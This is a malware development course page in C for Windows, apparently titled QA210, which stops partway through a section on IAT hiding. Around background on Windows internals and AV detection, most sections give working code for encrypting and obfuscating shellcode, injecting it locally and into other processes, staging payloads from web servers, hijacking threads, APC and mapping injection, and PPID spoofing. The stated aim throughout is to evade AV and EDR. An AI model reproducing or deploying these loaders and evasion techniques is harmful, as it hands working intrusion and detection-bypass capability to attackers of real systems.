Malware Development Research

Malware Development
Fundamentals

QA210 — From Windows API foundations to advanced EDR bypass techniques

33
Topics
C
Language
Win32
Platform
x64
Architecture

Malware Development Lifecycle (MDLC)

Development
Build & refine
Testing
Bug hunting
Offline AV/EDR
Local testing
Online AV/EDR
Cloud testing
IoC Analysis
Indicators
Loop Back
Step 1

Overview

Malware is software specifically designed to carry out malicious actions such as unauthorized access to a computer or stealing sensitive data. The term "malware" is often associated with illegal or criminal activity, but it can also be used by ethical hackers such as penetration testers and red team members during authorized security assessments of an organization.

From an offensive security perspective, testers typically have three main options when it comes to the types of tools used in an assessment: Open-Source Tools (OSTs) — which are quickly identified by security vendors; purchasing commercial tools — closed-source, with a better chance of bypassing security solutions; or developing custom tools — which have not been analyzed or identified by security vendors, providing the greatest advantage for the attacking team. This is why knowledge of malware development is crucial for a successful offensive security assessment.

Why Choose C?

Any programming language can be used to create malware — Python, PowerShell, C#, C++, Go. However, C stands out for the following reasons: low-level languages are harder to reverse engineer; they do not require prerequisites on the target system (unlike Python, which needs an interpreter); the resulting file size is compact; and they provide fine-grained control when interacting with the operating system. High-level languages are more abstracted from the OS, less efficient with memory, and offer less overall control due to the abstraction of complex functionality. In contrast, low-level languages like C provide a way to interact with the operating system at a detailed level and give developers more freedom when working with the system.

Malware Development Lifecycle (MDLC)

The Malware Development Lifecycle (MDLC) is a customized version of the SDLC, consisting of 5 main phases: Development — start building or refining functionality; Testing — perform testing to detect bugs; Offline AV/EDR Testing — run the developed malware against as many security products as possible offline; Online AV/EDR Testing — run against cloud-connected security products; and IoC Analysis — analyze the malware and extract Indicators of Compromise. After step 5, the process loops back to step 1 for continuous improvement.

Warning

Online AV/EDR testing may result in your malware being submitted to security vendors and added to their databases. Always test offline first, and exercise caution when testing online.

Required Tools

ToolPurpose
Visual StudioPrimary C/C++ development environment
x64dbgOpen-source debugger for Windows x64/x86 binaries
PE-BearPE structure analysis, view imports/exports
Process Hacker 2View and control processes, loaded DLLs, memory regions
MsfvenomShellcode payload generation
VMware / VirtualBoxVirtualization environment for testing
Windows SDKWindows development headers and libraries

Foundational Knowledge

Windows Architecture

A processor in the Windows operating system can operate in two different modes: User Mode and Kernel Mode. Applications run in user mode and operating system components run in kernel mode. When an application wants to perform a task such as creating a file, it cannot do so directly — the only entity that can complete the task is the kernel, so applications must follow a process called the Function Call Flow (FCF).

The main components in the Windows architecture include: User Processes — programs executed by the user (Notepad, Chrome); Subsystem DLLs — DLLs containing API functions called by user processes (kernel32.dll, user32.dll, advapi32.dll); Ntdll.dll — a system-wide DLL at the lowest layer of user mode that creates the transition from user mode to kernel mode (commonly referred to as the Native API or NTAPI); and Executive Kernel — the Windows Kernel that calls drivers and other modules in kernel mode.

Function Call Flow (FCF)

The FCF process begins when a user application calls a WinAPI function (e.g., CreateFile in kernel32.dll). This DLL then calls the equivalent NTAPI function (NtCreateFile in ntdll.dll). Next, ntdll.dll executes an assembly instruction (sysenter on x86 or syscall on x64) to transition to kernel mode. In kernel mode, the NtCreateFile function is called, which interacts with drivers and modules to complete the work.

Direct NTAPI Invocation

Applications can call NTAPI functions (functions in NTDLL) directly without going through the WinAPI. The WinAPI is simply a wrapper layer for the Native API. However, using the Native API is more difficult because it is not officially documented by Microsoft (undocumented).

Virtual Memory & Paging

In modern operating systems, memory is not mapped directly to physical RAM. Instead, processes use virtual memory addresses that are mapped to physical addresses. Virtual memory is based on the concept of Memory paging — memory is divided into "pages" of 4KB each. A page can be in one of several states: Free (no data, ready for use), Reserved (set aside for a specific purpose but no data yet), or Committed (assigned to an actual physical memory region).

Important page protection options: PAGE_NOACCESS (disables all access to the page), PAGE_EXECUTE_READWRITE (allows read, write, and execute — highly discouraged), PAGE_READONLY (allows read-only access).

Memory Protection

Two important memory protection mechanisms: DEP (Data Execution Prevention) — prevents code execution in memory regions that do not have the execute flag; and ASLR (Address Space Layout Randomization) — randomly arranges the address space positions of key data areas, including the base of the executable and the positions of the stack, heap, and libraries.

Windows API

The Windows API provides many specialized data types beyond common ones like int and float. Key data types include:

Data TypeDescriptionExample
HANDLEHandle to an object (file, process, event)HANDLE hFile = CreateFile(...)
DWORDUnsigned 32-bit integerDWORD dwBytesRead;
LPVOIDPointer to any typeLPVOID pMemory = VirtualAlloc(...)
LPSTR / LPWSTRANSI / Unicode string pointerLPSTR buf = "Hello";
BOOLRepresents TRUE or FALSEBOOL bResult = DeleteFile(...)
HMODULEHandle to a module (DLL/EXE)HMODULE hMod = GetModuleHandle(...)

ANSI vs Unicode

Most Windows API functions have two versions ending in "A" (ANSI) or "W" (Wide/Unicode). For example: CreateFileA takes LPCSTR (ANSI 8-bit string), CreateFileW takes LPCWSTR (Unicode 16-bit string). Note the different byte sizes: char str[] = "qa210" takes 6 bytes, wchar_t str[] = L"qa210" takes 12 bytes (2 bytes per character).

In/Out Parameters & Error Handling

The Windows API uses IN (input) and OUT (output) parameters. OUT parameters are typically passed by pointer. For error handling, use GetLastError() for WinAPI and NTSTATUS with the NT_SUCCESS() macro for NTAPI. Always check return values when calling WinAPI — for example, CreateFileW returns INVALID_HANDLE_VALUE on failure.

Portable Executable (PE) Format

PE is the executable file format on Windows, including EXE, DLL, and SYS. Understanding PE structure is a critical foundation for malware development because it allows you to understand how malware is loaded into memory, how imports/exports work, and how to perform injection techniques.

+======================================================+ | PE Structure | +======================================================+ | DOS Header (IMAGE_DOS_HEADER) | | +-- e_magic: "MZ" | | +-- e_lfanew -> offset to NT Headers | +------------------------------------------------------+ | DOS Stub | +------------------------------------------------------+ | NT Header (IMAGE_NT_HEADERS) | | +-- Signature: "PE\0\0" | | +-- File Header (IMAGE_FILE_HEADER) | | | +-- Machine, NumberOfSections | | | +-- SizeOfOptionalHeader | | +-- Optional Header (IMAGE_OPTIONAL_HEADER) | | +-- AddressOfEntryPoint | | +-- ImageBase | | +-- SectionAlignment / FileAlignment | | +-- DataDirectory[16] | | +-- [0] Export Table | | +-- [1] Import Table (IAT) | | +-- [2] Resource Table | | +-- ... | +------------------------------------------------------+ | Section Headers | | +-- .text (code, IMAGE_SCN_MEM_EXECUTE) | | +-- .data (global/static init vars, R/W) | | +-- .rdata (read-only data, const) | | +-- .rsrc (resources) | | +-- .reloc (relocations) | +======================================================+

Important PE components: DOS Header starts with the magic "MZ" (0x5A4D) and contains e_lfanew — the offset to NT Headers; File Header contains machine info, number of sections, and timestamp; Optional Header contains AddressOfEntryPoint (entry point), ImageBase (base address), and DataDirectory — an array of 16 entries pointing to important data tables like Export Table, Import Table, and Resource Table.

Dynamic-Link Library (DLL)

A DLL is a library containing code and data that can be used by multiple programs simultaneously. DLLs have an entry point DllMain that is called when the DLL is loaded/unloaded:

c
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Runs when DLL is loaded into a process
            break;
        case DLL_THREAD_ATTACH:
            // Runs when a new thread is created
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            // Runs when DLL is unloaded
            break;
    }
    return TRUE;
}

To export a function from a DLL, use __declspec(dllexport). There are two ways to load a DLL: Load-time dynamic linking (linked at compile time using a .lib file) and Run-time dynamic linking (linked at runtime using LoadLibraryA/W + GetProcAddress). Run-time linking is more common in malware because it does not leave traces in the IAT at compile time.

AV Malware Detection Mechanisms

Understanding how AV detects malware is the foundation for building bypass techniques. The main mechanisms include:

Static / Signature Detection
AV matches the program against a list of known rules (YARA rules). A signature is a sequence of bytes or strings that uniquely identifies malware. For example: shellcode starting with FC 48 83 E4 F0 E8 C0 00 00 00 can be identified as an msfvenom payload. Bypass: avoid hardcoding values, encrypt payloads, retrieve values dynamically.
Hashing Detection
AV stores hash values (MD5, SHA256) of known malware in a database. Bypass is extremely simple: changing even a single byte in the file will completely change the hash value.
Heuristic Detection
Experience-based detection, including: Static Heuristics (decompile and compare code against known malware) and Dynamic Heuristics (run in a sandbox and analyze suspicious behavior). More complex to bypass than simple signature detection.
Sandbox / Behavior-based Detection
Sandbox analysis examines file behavior during execution in an isolated environment. Behavior-based monitoring looks for suspicious indicators while malware is running — loading DLLs, calling specific APIs, connecting to the internet. Example: allocating memory + downloading shellcode + writing to memory + executing in sequence = malicious behavior.
API Hooking & IAT Checking
EDRs use API hooking to intercept and analyze parameters of commonly abused APIs in real time. IAT Checking: AV examines the Import Address Table to determine which APIs a program uses — for example, seeing CreateFileA + CryptHashData may flag the program as potential ransomware.

Payload Placement

As a malware developer, you have several choices for where to store the payload within a PE file. Depending on this choice, the payload will reside in a different section of the PE file, affecting read/write capabilities and the level of detection by AV.

.data Section

The .data section contains initialized global and static variables. This section is readable and writable (R/W), making it suitable for encrypted payloads that need to be decrypted at runtime. Payloads stored in global or local variables will be placed in .data depending on compiler settings.

c
// .data saved payload - read/write, suitable for encrypted payloads
unsigned char Data_RawData[] = {
    0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00,
    0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2
    // ... msfvenom shellcode
};

int main() {
    printf("[i] Data_RawData var : 0x%p \n", Data_RawData);
    // Can modify directly since .data is R/W
    return 0;
}

.rdata Section

Variables declared with the const keyword are stored in .rdata (read-only data). The "r" indicates the data is read-only — any attempt to modify it will cause an access violation. However, depending on the compiler, .data and .rdata may be merged, or even merged into .text. Use .rdata for payloads that do not need in-place decryption, but if in-place decryption is required, you must change the memory protection first.

Tip

Payloads can also be stored in any custom section using the pragma directive: #pragma section(".mysec", execute, read, write). This helps avoid signature detection based on inspecting .data/.rdata sections.

Payload Encryption

Payload Encryption is a technique used to hide code within a malicious file, making detection more difficult for security solutions. Encryption helps malware remain undetected for longer periods. However, the more data that is encrypted in a file, the higher the file's entropy — which can cause security solutions to flag the file as suspicious. The three most common encryption algorithms in malware development are XOR, RC4, and AES.

XOR Encryption

XOR is the simplest encryption algorithm, suitable for small payloads. Three levels of increasing complexity:

c
// Method 1: XOR with a single byte key (vulnerable to brute force)
VOID XorByOneKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (size_t i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ bKey;
    }
}

// Method 2: XOR with key + index (increases key space)
VOID XorByiKeys(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (size_t i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ (bKey + i);
    }
}

// Method 3: XOR with a multi-byte key array (hardest to crack)
VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize,
                   IN PBYTE bKey, IN SIZE_T sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j >= sKeySize) {
            j = 0;
        }
        pShellcode[i] = pShellcode[i] ^ bKey[j];
    }
}
Recommendation

XOR should be used for small payloads (e.g., obfuscating strings). For larger payloads, use AES or RC4 for stronger security and resistance to brute force attacks.

RC4 Encryption

RC4 is a fast, efficient, and bidirectional cryptographic algorithm — the same function is used for both encryption and decryption. RC4 uses the Key Scheduling Algorithm (KSA) to initialize the state array, then uses the Pseudo-Random Generation Algorithm (PRGA) to encrypt data.

c
// RC4 Key Scheduling Algorithm (KSA)
void rc4_init(unsigned char* key, int keylen, unsigned char* S) {
    int i, j = 0;
    for (i = 0; i < 256; i++) {
        S[i] = i;
    }
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) % 256;
        // Swap S[i] and S[j]
        unsigned char temp = S[i];
        S[i] = S[j];
        S[j] = temp;
    }
}

// RC4 Pseudo-Random Generation Algorithm (PRGA)
void rc4_crypt(unsigned char* S, unsigned char* data, int datalen) {
    int i = 0, j = 0, k;
    for (k = 0; k < datalen; k++) {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        // Swap S[i] and S[j]
        unsigned char temp = S[i];
        S[i] = S[j];
        S[j] = temp;
        // Generate keystream byte
        int t = (S[i] + S[j]) % 256;
        data[k] ^= S[t];
    }
}
NEVER hardcode keys!

Never hardcode keys directly in source code. Keys can be discovered during reverse engineering. All of the following key representations are detectable: unsigned char* key = "qa210";, unsigned char key[] = {0x71, 0x61, 0x32, ...};, or unsigned char key[] = {'q','a','2','1','0'};. Instead, generate keys at runtime or use a derivation method.

AES Encryption

AES (Advanced Encryption Standard) is the strongest symmetric encryption algorithm of the three, suitable for large payloads. The tiny-aes-c library provides a lightweight implementation of AES-128/192/256 suitable for malware development. AES uses a block cipher with a 16-byte block size and supports operating modes such as CBC, CTR, and ECB.

c
// Using tiny-aes-c to encrypt/decrypt payloads
#include "aes.h"

struct AES_ctx ctx;
uint8_t key[16] = { /* derived at runtime */ };
uint8_t iv[16]  = { /* derived at runtime */ };

// Initialize AES context with key and IV
AES_init_ctx_iv(&ctx, key, iv);

// Decrypt payload (AES-CBC mode)
AES_CBC_decrypt_buffer(&ctx, encryptedPayload, payloadSize);

Payload Obfuscation

Obfuscation is a technique for hiding payloads by transforming them into different formats (IPv4, IPv6, MAC addresses, UUIDs) to avoid signature detection. The payload is converted into strings that appear legitimate, and is only restored to its original form at runtime. These techniques help reduce entropy and make payloads look like normal data during static analysis.

IPv4/IPv6 Fuscation

Transforms the payload into IPv4 or IPv6 address strings. Every 4 bytes of shellcode are represented as one IPv4 address octet. For example: 0xFC4883E4 becomes 252.72.131.228. For IPv6, every 16 bytes of shellcode become one IPv6 address, allowing obfuscation of larger data per entry.

c
// IPv4 Deobfuscation - convert IPv4 strings back to shellcode
BOOL Ipv4Deobfuscation(IN CHAR* Ipv4Array[], IN SIZE_T NmbrOfElements,
                       OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
    PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 4);
    if (!pBytes) return FALSE;

    for (SIZE_T i = 0; i < NmbrOfElements; i++) {
        // inet_addr converts "A.B.C.D" to 4 bytes
        *(DWORD*)(pBytes + i * 4) = inet_addr(Ipv4Array[i]);
    }

    *ppDAddress = pBytes;
    *pDSize = NmbrOfElements * 4;
    return TRUE;
}

MAC Fuscation

Similar to IPv4, but transforms the payload into MAC addresses. Every 6 bytes of shellcode become one MAC address. The sscanf function with format string "%02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx" is used to parse MAC addresses back into bytes.

UUID Fuscation

Every 16 bytes of shellcode are represented as a UUID (e.g., FC4883E4-F0E8-C000-0000-4151-41505251). Use UuidFromStringA from the WinAPI to convert a UUID string back into 16 binary bytes. This is a powerful technique because UUIDs look completely legitimate in source code and have a fixed size of 16 bytes per entry.

c
// UUID Deobfuscation
BOOL UuidDeobfuscation(IN CONST RPC_CSTR UuidArray[], IN SIZE_T NmbrOfElements,
                       OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
    PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 16);
    if (!pBytes) return FALSE;

    for (SIZE_T i = 0; i < NmbrOfElements; i++) {
        // UuidFromStringA converts UUID string to 16 bytes
        if (RPC_S_OK != UuidFromStringA((RPC_CSTR)UuidArray[i],
                (UUID*)(pBytes + i * 16))) {
            return FALSE;
        }
    }

    *ppDAddress = pBytes;
    *pDSize = NmbrOfElements * 16;
    return TRUE;
}

Local Payload Execution

Shellcode Injection (Local)

The process of executing shellcode in the current process consists of the following main steps: allocate a memory region with VirtualAlloc, write the payload to that region, change memory protection if needed, create a thread to execute, and free the memory when done.

c
// Local Shellcode Injection - basic process
BOOL RunShellcode(IN PBYTE pShellcode, IN SIZE_T sSizeOfShellcode) {
    // 1. Allocate RW memory region
    PVOID pAddress = VirtualAlloc(NULL, sSizeOfShellcode,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_READWRITE);
    if (!pAddress) return FALSE;

    // 2. Write payload to memory region
    memcpy(pAddress, pShellcode, sSizeOfShellcode);

    // 3. Change protection to RX (executable)
    DWORD dwOldProtection = 0;
    if (!VirtualProtect(pAddress, sSizeOfShellcode,
                        PAGE_EXECUTE_READ, &dwOldProtection))
        return FALSE;

    // 4. Execute payload using CreateThread
    HANDLE hThread = CreateThread(NULL, 0,
                                   (LPTHREAD_START_ROUTINE)pAddress,
                                   NULL, 0, NULL);
    if (!hThread) return FALSE;

    // 5. Wait for thread to complete
    WaitForSingleObject(hThread, INFINITE);

    // 6. Free memory
    VirtualFree(pAddress, 0, MEM_RELEASE);
    CloseHandle(hThread);
    return TRUE;
}
RWX is a red flag

Using PAGE_EXECUTE_READWRITE (RWX) is a major red flag for AV/EDR. Always use the RW → Write → RX flow instead of directly allocating RWX memory. Allocating RWX memory is one of the most suspicious behaviors that security solutions monitor.

DLL Injection (Process Injection)

DLL Injection is the technique of inserting a DLL into a running process. The process: open a handle to the target process with OpenProcess, allocate memory in the target process with VirtualAllocEx, write the DLL path with WriteProcessMemory, and create a remote thread that calls LoadLibraryA using CreateRemoteThread.

c
// DLL Injection into a remote process
BOOL InjectDll(IN DWORD dwPid, IN const char* dllPath) {
    // 1. Open handle to target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (!hProcess) return FALSE;

    // 2. Allocate memory in target process
    SIZE_T sSize = strlen(dllPath) + 1;
    PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
                                     MEM_COMMIT | MEM_RESERVE,
                                     PAGE_READWRITE);
    if (!pAddress) { CloseHandle(hProcess); return FALSE; }

    // 3. Write DLL path to target process
    if (!WriteProcessMemory(hProcess, pAddress, dllPath, sSize, NULL)) {
        CloseHandle(hProcess); return FALSE;
    }

    // 4. Find LoadLibraryA address
    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
    pfnLoadLibraryA pLoadLibraryA = (pfnLoadLibraryA)
        GetProcAddress(hKernel32, "LoadLibraryA");

    // 5. Create remote thread calling LoadLibraryA
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                                         (LPTHREAD_START_ROUTINE)pLoadLibraryA,
                                         pAddress, 0, NULL);
    if (!hThread) { CloseHandle(hProcess); return FALSE; }

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    return TRUE;
}

Shellcode Injection (Remote)

Remote Shellcode Injection is similar to DLL Injection, but instead of writing a DLL path and calling LoadLibraryA, you write shellcode directly into the target process and create a remote thread to execute at the shellcode address. This technique is more flexible because it does not require a DLL file on disk.

Staging

Staging is the technique of storing payloads at an external source (web server, Windows Registry) rather than embedding them directly in the binary. This helps reduce the executable file size, lower entropy, and allows updating payloads without recompiling. Staging is particularly useful when payloads are large or when you need to change payloads between executions.

Web Server Staging

Uses the WinINet API (InternetOpenW, InternetOpenUrlW, InternetReadFile) to download payloads from a remote server. The process: initialize a WinINet session, open the URL, read the data, and close handles. Payload size can be determined dynamically by reading until no more data is available.

c
// Download payload from a web server
BOOL DownloadPayload(IN LPCWSTR url, OUT PBYTE* ppBuffer, OUT SIZE_T* pSize) {
    HINTERNET hInternet = InternetOpenW(L"Mozilla/5.0",
                                          INTERNET_OPEN_TYPE_DIRECT,
                                          NULL, NULL, 0);
    if (!hInternet) return FALSE;

    HINTERNET hUrl = InternetOpenUrlW(hInternet, url, NULL, 0,
                                        INTERNET_FLAG_SECURE, 0);
    if (!hUrl) { InternetCloseHandle(hInternet); return FALSE; }

    // Dynamic payload size - read until no more data
    DWORD dwBytesRead = 0;
    SIZE_T totalSize = 0;
    BYTE tempBuffer[4096];
    PBYTE pBuffer = NULL;

    while (InternetReadFile(hUrl, tempBuffer, sizeof(tempBuffer), &dwBytesRead)
           && dwBytesRead > 0) {
        pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), 0, pBuffer,
                                      totalSize + dwBytesRead);
        memcpy(pBuffer + totalSize, tempBuffer, dwBytesRead);
        totalSize += dwBytesRead;
    }

    *ppBuffer = pBuffer;
    *pSize = totalSize;

    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);
    return TRUE;
}

Windows Registry Staging

The Windows Registry can be used as a payload storage location. Advantages: no network connection required, payloads are stored persistently on the system. Use RegOpenKeyExW, RegSetValueExW, and RegGetValueW to write and read payloads from the Registry. Conditional compilation (#ifdef) can be used to create two separate binaries: one to stage the payload into the Registry, and one to read and execute it.

Thread Hijacking

Thread Hijacking is a technique that takes control of a running thread to execute malicious code instead of creating a new thread. The main advantage over CreateThread/CreateRemoteThread is that no new thread is created — this helps avoid detection by security solutions that monitor thread creation. The technique works by suspending a thread, changing its context (specifically the instruction pointer RIP/EIP) to point to the shellcode, and then resuming the thread.

Local Thread Hijacking

c
// Local Thread Hijacking
BOOL HijackThread(IN HANDLE hThread, IN PVOID pAddress) {
    // 1. Suspend the thread
    SuspendThread(hThread);

    // 2. Get thread context
    CONTEXT ctx = { .ContextFlags = CONTEXT_FULL };
    if (!GetThreadContext(hThread, &ctx)) {
        ResumeThread(hThread);
        return FALSE;
    }

    // 3. Change instruction pointer (RIP on x64)
    ctx.Rip = (DWORD64)pAddress;

    // 4. Set the new thread context
    if (!SetThreadContext(hThread, &ctx)) {
        ResumeThread(hThread);
        return FALSE;
    }

    // 5. Resume thread - will execute from the new address
    ResumeThread(hThread);
    return TRUE;
}

Remote Thread Hijacking

Remote Thread Hijacking applies the same principle but to threads of a different process. Additional step: use CreateToolhelp32Snapshot to enumerate threads of the target process, then select an appropriate thread to hijack. This technique completely avoids calling CreateRemoteThread — an API commonly hooked by EDR.

APC Injection

Asynchronous Procedure Call (APC) is a Windows mechanism that allows code execution in the context of a specific thread. APC Injection leverages this mechanism to insert a payload into a target thread's APC queue. When the thread enters an alertable state (calling SleepEx, WaitForSingleObjectEx, etc.), the APC will be executed.

Standard APC Injection

c
// APC Injection into a remote process
BOOL ApcInjection(IN DWORD dwPid, IN PBYTE pShellcode, IN SIZE_T sSize) {
    // 1. Open target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

    // 2. Allocate and write shellcode
    PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
                                     MEM_COMMIT | MEM_RESERVE,
                                     PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, pAddress, pShellcode, sSize, NULL);

    // 3. Find alertable threads
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te32 = { .dwSize = sizeof(THREADENTRY32) };

    if (Thread32First(hSnapshot, &te32)) {
        do {
            if (te32.th32OwnerProcessID == dwPid) {
                HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE,
                                             te32.th32ThreadID);
                // 4. Queue APC to the thread
                QueueUserAPC((PAPCFUNC)pAddress, hThread, 0);
                CloseHandle(hThread);
            }
        } while (Thread32Next(hSnapshot, &te32));
    }

    CloseHandle(hSnapshot);
    CloseHandle(hProcess);
    return TRUE;
}

Early Bird APC Injection

Early Bird is a variant of APC Injection that executes before the main thread of the process begins running. The process: create a process in a suspended state using CreateProcess with the CREATE_SUSPENDED flag, queue an APC to the main thread, then resume the process. The thread will execute the APC before running the process's main code. This technique is particularly effective because it avoids race conditions — the thread is guaranteed to be in an alertable state when resumed.

Callback Code Execution

Callback Code Execution takes advantage of Windows APIs that accept function pointer callbacks as parameters. Instead of creating a new thread or injecting into another process, malware passes the shellcode address as a callback function to legitimate APIs. When the API is called, it executes the callback — which is the shellcode. This technique is extremely effective because it uses legitimate APIs, does not create new threads, and is difficult to detect through conventional monitoring methods.

c
// Callback Code Execution - using EnumWindows
// Pass shellcode address as the callback
BOOL result = EnumWindows((WNDENUMPROC)pShellcodeAddress, 0);

// Other callback APIs that can be used:
// EnumChildWindows, EnumDesktopWindows, EnumSystemLocalesA
// EnumSystemLocalesW, EnumTimeFormatsA, EnumDesktopWindows
// CreateTimerQueueTimer, EnumUILanguages
// CertEnumSystemStore, EnumSystemGeoID
Advantage

Callback execution does not require CreateThread or CreateRemoteThread, does not modify thread context, and uses completely legitimate Windows APIs. This is one of the stealthiest techniques for executing shellcode.

Mapping Injection

Mapping Injection uses Windows Section objects (shared memory) to inject shellcode into a target process without needing VirtualAllocEx/WriteProcessMemory — two APIs commonly hooked by EDR. This technique uses NtCreateSection, NtMapViewOfSection, and NtUnmapViewOfSection to create a shared memory section, write the payload to a local view, then map it into the target process.

c
// Local Mapping Injection
BOOL MappingInjection(IN PBYTE pShellcode, IN SIZE_T sSize) {
    HANDLE hSection = NULL;
    PVOID pLocalView = NULL;
    PVOID pRemoteView = NULL;
    SIZE_T sViewSize = sSize;

    // 1. Create section object
    NTSTATUS status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
                                        &(LARGE_INTEGER){ .QuadPart = sSize },
                                        PAGE_EXECUTE_READWRITE,
                                        SEC_COMMIT, NULL);

    // 2. Map section into local process (R/W)
    NtMapViewOfSection(hSection, GetCurrentProcess(), &pLocalView, 0, 0,
                       NULL, &sViewSize, ViewUnmap, 0, PAGE_READWRITE);

    // 3. Write shellcode to local view
    memcpy(pLocalView, pShellcode, sSize);

    // 4. Map section into local process with RX (executable)
    NtMapViewOfSection(hSection, GetCurrentProcess(), &pRemoteView, 0, 0,
                       NULL, &sViewSize, ViewUnmap, 0, PAGE_EXECUTE_READ);

    // 5. Execute shellcode
    HANDLE hThread = CreateThread(NULL, 0,
                                   (LPTHREAD_START_ROUTINE)pRemoteView,
                                   NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // 6. Cleanup
    NtUnmapViewOfSection(GetCurrentProcess(), pLocalView);
    NtUnmapViewOfSection(GetCurrentProcess(), pRemoteView);
    NtClose(hSection);
    CloseHandle(hThread);
    return TRUE;
}

Remote Mapping Injection

The remote variant maps the section object into a target process instead of the local process. This completely bypasses VirtualAllocEx and WriteProcessMemory by using NtMapViewOfSection with the target process handle. This technique is considered one of the most sophisticated injection methods available today.

Function Stomping Injection

Function Stomping (also known as Function Hooking Overwrite) is a technique that overwrites the content of a legitimate function in a loaded DLL with shellcode. Instead of allocating new memory, it uses existing memory that is already marked as executable. This technique helps bypass security checks that monitor the allocation of new executable memory regions.

The process: load a DLL into the process using LoadLibraryA, find the target function address using GetProcAddress, change the memory protection to RW using VirtualProtect, overwrite the function with shellcode, restore the protection to RX, and execute via a callback or by directly calling the overwritten function.

Target Function Selection Tip

Choose functions that are rarely called during normal operation — for example, functions in rarely-used DLLs. If you choose a frequently-called function (like CreateFileW), the shellcode will execute multiple times unintentionally or cause crashes.

Spoofing

PPID Spoofing (Parent Process ID)

PPID Spoofing changes the parent process of a newly created process, making it appear as if it was launched by a legitimate process (e.g., explorer.exe) rather than the malware. This helps bypass security rules based on parent-child process relationships. The technique uses PROC_THREAD_ATTRIBUTE_LIST and UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify the parent process.

c
// PPID Spoofing - create process with a fake parent process
BOOL CreateSpoofedProcess(IN DWORD dwParentPid, IN LPCWSTR lpCmdLine) {
    // Open handle to the parent process to spoof
    HANDLE hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwParentPid);

    // Initialize STARTUPINFOEX
    STARTUPINFOEXW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.StartupInfo.cb = sizeof(STARTUPINFOEXW);

    // Allocate PROC_THREAD_ATTRIBUTE_LIST
    SIZE_T sAttrListSize = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &sAttrListSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
        HeapAlloc(GetProcessHeap(), 0, sAttrListSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sAttrListSize);

    // Set parent process attribute
    UpdateProcThreadAttribute(si.lpAttributeList, 0,
                               PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                               &hParentProcess, sizeof(HANDLE), NULL, NULL);

    // Create process with spoofed PPID
    CreateProcessW(NULL, (LPWSTR)lpCmdLine, NULL, NULL, FALSE,
                    EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                    &si.StartupInfo, &pi);

    // Cleanup
    DeleteProcThreadAttributeList(si.lpAttributeList);
    CloseHandle(hParentProcess);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return TRUE;
}

Process Argument Spoofing

Process Argument Spoofing creates a process with fake command-line arguments (appearing legitimate, such as notepad.exe C:\Windows\Temp\readme.txt), but then overwrites them with the real arguments in memory before the process actually executes. This technique deceives monitoring tools that only read the initial command line.

String Hashing

String Hashing replaces API name strings with their hash values, helping avoid detection through IAT checking and string scanning. Instead of calling GetProcAddress(hModule, "VirtualAlloc"), you calculate the hash of "VirtualAlloc" and find the function with a matching hash in the DLL's Export Table. Common hashing algorithms:

c
// DjB2 Hash Algorithm
DWORD HashStringDjb2A(IN PCHAR String) {
    ULONG Hash = 5381;
    while (*String) {
        Hash = ((Hash << 5) + Hash) + *String;
        String++;
    }
    return Hash;
}

// Jenkins One-At-A-Time 32-bit Hash
DWORD HashStringJenkinsOneAtATime32BitA(IN PCHAR String) {
    DWORD Hash = 0;
    while (*String) {
        Hash += *String;
        Hash += Hash << 10;
        Hash ^= Hash >> 6;
        String++;
    }
    Hash += Hash << 3;
    Hash ^= Hash >> 11;
    Hash += Hash << 15;
    return Hash;
}

IAT Hiding & Obfuscation

The IAT (Import Address Table) contains a list of all functions that a program uses — information that is extremely valuable to AV. IAT Hiding is a technique to remove or conceal this information, preventing AV from knowing which APIs the program uses simply by checking the IAT.

Method 1: Dynamic Resolution

